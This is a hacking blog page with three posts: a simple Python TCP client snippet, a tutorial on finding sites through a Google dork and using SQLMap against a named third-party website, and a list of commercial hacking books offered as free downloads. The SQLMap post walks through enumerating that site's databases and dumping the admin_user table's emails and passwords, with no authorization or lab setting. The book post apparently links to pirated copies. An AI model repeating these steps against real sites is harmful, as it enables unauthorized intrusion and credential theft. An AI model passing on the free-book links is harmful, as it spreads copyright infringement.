The Dark Tech

The Dark Tech

For Beginners

Creating A TCP Client for Hacking Using Python

By 2 Comments

Introduction To Python

Python has a simple syntax similar to the English language. Python has syntax that allows developers to write programs with fewer lines than some other programming languages. Python runs on an interpreter system, meaning that code can be executed as soon as it is written.

TCP Client Using Python

There have been countless times during penetration tests that I’ve needed
to whip up a TCP client to test for services, send garbage data, fuzz, or
any number of other tasks. If you are working within the confines of large
enterprise environments, you won’t have the luxury of networking tools or
compilers, and sometimes you’ll even be missing the absolute basics like the
ability to copy/paste or an Internet connection. This is where being able to
quickly create a TCP client comes in extremely handy. But enough jabber-
ing—let’s get coding. Here is a simple TCP client.

import socket
target_host = "www.google.com"
target_port = 80
# create a socket object
 client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

We first create a socket object with the AF_INET and SOCK_STREAM param-
eters. The AF_INET parameter is saying we are going to use a standard
IPv4 address or hostname, and SOCK_STREAM indicates that this will be a TCP Client.

# connect the client
 client.connect((target_host,target_port))
# send some data
 client.send("GET / HTTP/1.1\r\nHost: google.com\r\n\r\n")

We then connect the client to the server and send it some data.

# receive some data
 response = client.recv(4096) 
print response

The last step is to receive some data back and print out the response .
This is the simplest form of a TCP client, but the one you will write most
often.


In the above code snippet, we are making some serious assumptions
about sockets that you definitely want to be aware of. The first assump-
tion is that our connection will always succeed, and the second is that the
server is always expecting us to send data first (as opposed to servers that
expect to send data to you first and await your response). Our third assump-
tion is that the server will always send us data back in a timely fashion. We
make these assumptions largely for simplicity’s sake. While programmers
have varied opinions about how to deal with blocking sockets, exception-
handling in sockets, and the like, it’s quite rare for pentesters to build these
niceties into the quick-and-dirty tools for recon or exploitation work, so
we’ll omit them in this article.

Also Check Google Dorks | An Easy Way Of Hacking Using Google

Most Easy Way To Hack Database With SQLMap

By Leave a Comment

Introduction To SQL Injection

SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).SQL injection must exploit a security vulnerability in an application’s software. For example, when user input is either incorrectly filtered for string literalescape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites. But can be used to attack any type of SQL database.

SQL injection attacks allow attackers to spoof identity, tamper with existing data. It can cause repudiation issues such as voiding transactions or changing balances. It can allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.

What is SQLMap

SQLMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Step 1: Find a website which can be Vulnerable

We will use Google Dork string to find Vulnerable website which can be SQLMAP SQL injectable.

You can click on this link to know more about Google Dorks

We will use Google Dork Syntax given below.

inurl:index.php?id=

Then Google will show us all sites with our dork in their url. They will look like this.

“ http://www.tunesoman.com/product.php?id=200 “

Now we will check weather the website is vulnerable or not by adding single quotation mark ‘ at the end of the URL

http://www.tunesoman.com/product.php?id=200’

If the page returns an SQL error, the page is vulnerable to SQL injection. See the example of sql error in below

Now we have the site vulnerable for our attack

Step 2: Now Open SQLMAP

Open SQLMAP in the terminal. If you want to see more information about SQLMAP then type “sqlmap — help”. It will give you all the options which are used while performing SQLMAP. let’s see the screenshot below

To find the databases behind the web site, we need to type the following command in the terminal:-

sqlmap –u the enire URL of the vulnerable web page — dbs

In our case:-

sqlmap –u http://www.tunesoman.com/product.php?id=200 — dbs

-u option is used for url

–dbs is used to enumerate DBMS databases

When we run this command on our target url we get the results shown below.

Here we can see the 2 databases are available

Now see I have highlighted the two available databases, information_schema and db363851433. Information schema is included in every MySQL installation. It includes information on all the objects in the MySQL instances, But it does not contains any data valuable for us. Although it can be beneficial to explore those databases to find objects in all the databases in the instance. We will focus our attention on the database here, db363851433 that may have some valuable information. Let’s explore it further.We can retrieve all the tables which are present in database db363851433 by using following command

sqlmap –u http://www.tunesoman.com/product.php?id=200 –D db363851433 –tables

Here we can see the list of the all avalible tables.

Now I want to find more information about admin_user table then type the following command

Now I want to gain more information about admin_user table then type the following command

sqlmap –u http://www.tunesoman.com/product.php?id=200 –D db363851433 –T admin_user –columns

The above command will give us list of all the columns avalible in admin_user table.

Here we can see the all avalible columns of selected table.

Now I want to find the attribute values such as “ admin_email , admin_pass ” present in the table “ admin_user “

Then I will type the following command:-

sqlmap –u http://www.tunesoman.com/product.php?id=200 –D db363851433 –T admin_user –C admin_email,admin_pass –dump

Now it will show us all the entries in the columns we provided.

In this way we can hack the database in very simple way.

Best Hacking Free Books 2020

By Leave a Comment

When it comes to learning hacking Books are the best method to learn Hacking. In this post, I will be sharing the best hacking books. These all Hacking books are paid but, here I will give you all the books for free . The Books which I am going to give to you guys are one of the most popular hacking books. The books which I am going to give you all gyes are : – Hacking: The Art of Exploitation, The Web Application Hacker’s Handbook, The Basics of Hacking and Penetration Testing, Penetration Testing: A Hands-on Introduction to Hacking, RTFM: Red Team Field Manual , The Hacker Playbook 2: Practical Guide to Penetration Testing , Black Hat Python: Python Programming for Hackers and Pentesters , Advanced Penetration Testing: Hacking the World’s Most Secure Networks , Kali Linux Revealed: Mastering the Penetration Testing Distribution , Metasploit: The Penetration Tester’s Guide , The Hackers Playbook 2 , Social Engineering: The Art of Human Hacking

NOTE :- IF any link doesnt open try using VPN

Hacking: The Art of Exploitation

Book Description
Hacking is the art of creative problem solving, whether that means finding an unconventional solution to a difficult problem or exploiting holes in sloppy programming. Many people call themselves hackers, but few have the strong technical foundation needed to really push the envelope.

Rather than merely showing how to run existing exploits, author Jon Erickson explains how arcane hacking techniques actually work. To share the art and science of hacking in a way that is accessible to everyone, Hacking: The Art of Exploitation, 2nd Edition introduces the fundamentals of C programming from a hacker’s perspective.

Book Link :- HACKING: THE ART OF EXPLOITATION

Also Read :- WhatsApp Plus Latest Version MOD APK Download | For Android 2020

The Web Application Hacker’s Handbook

For over a decade, The Web Application Hacker’s Handbook (WAHH) has been the de facto standard reference book for people who are learning about web security

Web applications are the front door to most organizations, exposing them to attacks that may disclose personal information, execute fraudulent transactions, or compromise ordinary users. This practical book has been completely updated and revised to discuss the latest step-by-step techniques for attacking and defending the range of ever-evolving web applications. You’ll explore the various new technologies employed in web applications that have appeared since the first edition and review the new attack techniques that have been developed, particularly in relation to the client-side.

Reveals how to overcome the new technologies and techniques aimed at defending web applications against attacks that have appeared since the previous edition
Discusses new remoting frameworks, HTML5, cross-domain integration techniques, UI redress, frame busting, HTTP parameter pollution, hybrid file attacks, and more
Features a companion web site hosted by the authors that allow readers to try out the attacks described, gives answers to the questions that are posed at the end of each chapter, and provides a summarized methodology and checklist of tasks
Focusing on the areas of web application security where things have changed in recent years, this book is the most current resource on the critical topic of discovering, exploiting, and preventing web application security flaws.

Book Link :- The Web Application Hacker’s Handbook

The Basics of Hacking and Penetration Testing

The Basics of Hacking and Penetration Testing, Second Edition, serves as an introduction to the steps required to complete a penetration test or perform an ethical hack from beginning to end. The book teaches students how to properly utilize and interpret the results of the modern-day hacking tools required to complete a penetration test. It provides a simple and clean explanation of how to effectively utilize these tools, along with a four-step methodology for conducting a penetration test or hack, thus equipping students with the know-how required to jump start their careers and gain a better understanding of offensive security.

Each chapter contains hands-on examples and exercises that are designed to teach learners how to interpret results and utilize those results in later phases. Tool coverage includes: Backtrack Linux, Google reconnaissance, MetaGooFil, dig, Nmap, Nessus, Metasploit, Fast Track Autopwn, Netcat, and Hacker Defender rootkit. This is complemented by PowerPoint slides for use in class.

This book is an ideal resource for security consultants, beginning InfoSec professionals, and students.

Each chapter contains hands-on examples and exercises that are designed to teach you how to interpret the results and utilize those results in later phases.
Written by an author who works in the field as a Penetration Tester and who teaches Offensive Security, Penetration Testing, and Ethical Hacking, and Exploitation classes at Dakota State University.
Utilizes the Kali Linux distribution and focuses on the seminal tools required to complete a penetration test.

BOOK LINK :- The Basics of Hacking and Penetration Testing

Also Read :- Garena Free Fire 2020 , Wallhack ,Aimbot Location/ESP Hack ,Speed Hack,High Jump, Flying Underwater

Penetration Testing: A Hands-on Introduction to Hacking

Penetration testers simulate cyber attacks to find security weaknesses in networks, operating systems, and applications. Information security experts worldwide use penetration techniques to evaluate enterprise defenses.

Penetration Testing: A Hands-on Introduction to Hacking

In Penetration Testing, security expert, researcher, and trainer Georgia Weidman introduces you to the core skills and techniques that every pentester needs. Using a virtual machine–based lab that includes Kali Linux and vulnerable operating systems, you’ll run through a series of practical lessons with tools like Wireshark, Nmap, and Burp Suite. As you follow along with the labs and launch attacks, you’ll experience the key stages of an actual assessment—including information gathering, finding exploitable vulnerabilities, gaining access to systems, post exploitation, and more.

Learn how to:
Crack passwords and wireless network keys with brute-forcing and wordlists
Test web applications for vulnerabilities
Use the Metasploit Framework to launch exploits and write your own Metasploit modules
Automate social-engineering attacks
Bypass antivirus software
–Turn access to one machine into total control of the enterprise in the post exploitation phase

You’ll even explore writing your own exploits. Then it’s on to mobile hacking—Weidman’s particular area of research—with her tool, the Smartphone Pentest Framework.

With its collection of hands-on lessons that cover key tools and strategies, Penetration Testing is the introduction that every aspiring hacker needs.

BOOK LINK :- Penetration Testing: A Hands-on Introduction to Hacking

Black Hat Python: Python Programming for Hackers and Pentesters

When it comes to creating powerful and effective hacking tools, Python is the language of choice for most security analysts. But just how does the magic happen?

In Black Hat Python, the latest from Justin Seitz (author of the best-selling Gray Hat Python), you’ll explore the darker side of Python’s capabilities—writing network sniffers, manipulating packets, infecting virtual machines, creating stealthy trojans, and more.

You’ll learn how to:
Create a trojan command-and-control using GitHub
Detect sandboxing and automate com­mon malware tasks, like keylogging and screenshotting
–Escalate Windows privileges with creative process control
–Use offensive memory forensics tricks to retrieve password hashes and inject shellcode into a virtual machine
Extend the popular Burp Suite web-hacking tool
Abuse Windows COM automation to perform a man-in-the-browser attack
Exfiltrate data from a network most sneakily

Insider techniques and creative challenges throughout show you how to extend the hacks and how to write your own exploits.

When it comes to offensive security, your ability to create powerful tools on the fly is indispensable. Learn how in Black Hat Python.

BOOK LINK :- Black Hat Python: Python Programming for Hackers and Pentesters

Advanced Penetration Testing: Hacking the World’s Most Secure Networks

Build a better defense against motivated, organized, professional attacks Advanced Penetration Testing: Hacking the World’s Most Secure Networks takes hacking far beyond Kali linux and Metasploit to provide a more complex attack simulation.

Featuring techniques not taught in any certification prep or covered by common defensive scanners, this book integrates social engineering, programming, and vulnerability exploits into a multidisciplinary approach for targeting and compromising high security environments.

From discovering and creating attack vectors, and moving unseen through a target enterprise, to establishing command and exfiltrating data even from organizations without a direct Internet connection this guide contains the crucial techniques that provide a more accurate picture of your system’s defense. Custom coding examples use VBA, Windows Scripting Host, C, Java, JavaScript, Flash, and more, with coverage of standard library applications and the use of scanning tools to bypass common defensive measures. Typical penetration testing consists of low-level hackers attacking a system with a list of known vulnerabilities, and defenders preventing those hacks using an equally well-known list of defensive scans.

Also Read :- Python and Go Top the Chart of 2019’s Most Popular Hacking Tools

The professional hackers and nation states on the forefront of today’s threats operate at a much more complex level and this book shows you how to defend your high security network. * Use targeted social engineering pretexts to create the initial compromise * Leave a command and control structure in place for long-term access * Escalate privilege and breach networks, operating systems, and trust structures * Infiltrate further using harvested credentials while expanding control Today’s threats are organized, professionally-run, and very much for-profit. Financial institutions, health care organizations, law enforcement, government agencies, and other high-value targets need to harden their IT infrastructure and human capital against targeted advanced attacks from motivated professionals

. Advanced Penetration Testing goes beyond Kali linux and Metasploit and to provide you advanced pen testing for high security networks.

BOOK LINK:- Advanced Penetration Testing: Hacking the World’s Most Secure Networks

Kali Linux Revealed: Mastering the Penetration Testing Distribution

After Reading this book you will be able to :-
Use the Kali Linux OS proficiently.
Automate, customize and pre-seed Kali Linux Installs.
Create Kali appliances such as the Kali ISO of Doom.
Build, modify and host Kali packages and repositories.
Create, fork and modify simple Kali packages.
Customize and rebuild your Kernel.
Deploy Kali over the network.
Manage and orchestrate multiple installations of Kali.
Build and customize Kali ARM images.
Create custom pentesting devices.

BOOK LINK :- Kali Linux Revealed: Mastering the Penetration Testing Distribution

Metasploit: The Penetration Tester’s Guide

The Metasploit Framework makes discovering, exploiting, and sharing vulnerabilities quick and relatively painless. But while Metasploit is used by security professionals everywhere, the tool can be hard to grasp for first-time users. Metasploit: The Penetration Tester’s Guide fills this gap by teaching you how to harness the Framework and interact with the vibrant community of Metasploit contributors.

Once you’ve built your foundation for penetration testing, you’ll learn the Framework’s conventions, interfaces, and module system as you launch simulated attacks. You’ll move on to advanced penetration testing techniques, including network reconnaissance and enumeration, client-side attacks, wireless attacks, and targeted social-engineering attacks.

Learn how to:
Find and exploit unmaintained, misconfigured, and unpatched systems
Perform reconnaissance and find valuable information about your target
Bypass anti-virus technologies and circumvent security controls
Integrate Nmap, NeXpose, and Nessus with Metasploit to automate discovery
Use the Meterpreter shell to launch further attacks from inside the network
Harness standalone Metasploit utilities, third-party tools, and plug-ins
Learn how to write your own Meterpreter post exploitation modules and scripts

You’ll even touch on exploit discovery for zero-day research, write a fuzzer, port existing exploits into the Framework, and learn how to cover your tracks. Whether your goal is to secure your own networks or to put someone else’s to the test, Metasploit: The Penetration Tester’s Guide will take you there and beyond.

Social Engineering: The Art of Human Hacking

The first book to reveal and dissect the technical aspect of many social engineering maneuvers From elicitation, pretexting, influence and manipulation all aspects of social engineering are picked apart, discussed and explained by using real-world examples, personal experience and the science behind them to unraveled the mystery in social engineering.

Kevin Mitnick one of the most famous social engineers in the world popularized the term social engineering. He explained that it is much easier to trick someone into revealing a password for a system than to exert the effort of hacking into the system. Mitnick claims that this social engineering tactic was the single-most effective method in his arsenal.

This indispensable book examines a variety of maneuvers that are aimed at deceiving unsuspecting victims, while it also addresses ways to prevent social engineering threats. * Examines social engineering, the science of influencing a target to perform the desired task or divulge information * Arms you with invaluable information about the many methods of trickery that hackers use in order to gather information with the intent of executing identity theft, fraud, or gaining computer system access * Reveals vital steps for preventing social engineering threats Social Engineering: The Art of Human Hacking does its part to prepare you against nefarious hackers now you can do your part by putting to good use the critical information within its pages.

Also Read :- 5 Ways To Hack Mobile Phones

SO, these were all the hacking books which you avail for free . Go through every books deeply which would help you clera all your hacking related problems .

We Had shared All the possible books if you want any other book do let us know in comment section and dont forget to share your feedback on our post .

Thankyou

Vaibhav kunjir